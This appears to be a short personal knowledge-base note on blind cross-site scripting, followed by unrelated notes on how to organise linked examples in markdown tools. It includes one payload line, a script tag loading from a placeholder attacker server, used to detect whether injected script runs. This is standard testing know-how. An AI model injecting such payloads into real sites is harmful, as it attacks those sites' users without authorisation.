alipzsh/knowledge-base/xss.md

 try making the victim’s browser generate a request to a server you own:
 `<script src='http://YOUR_SERVER_IP/xss'></script>`
 If you see a request to the path /xss, a blind XSS has been triggered!

+# how to handle links to examples
+ 1. in some other file (at some point I will have to have multiple examples in one file and I should be able to link to an specific one) not sure if it's supported in pandoc but it is in obs, and no idea on vimwiki
+ 2. each example in separate file (too messy, but works)
+ 3. in the same docuement: will be too long and slow.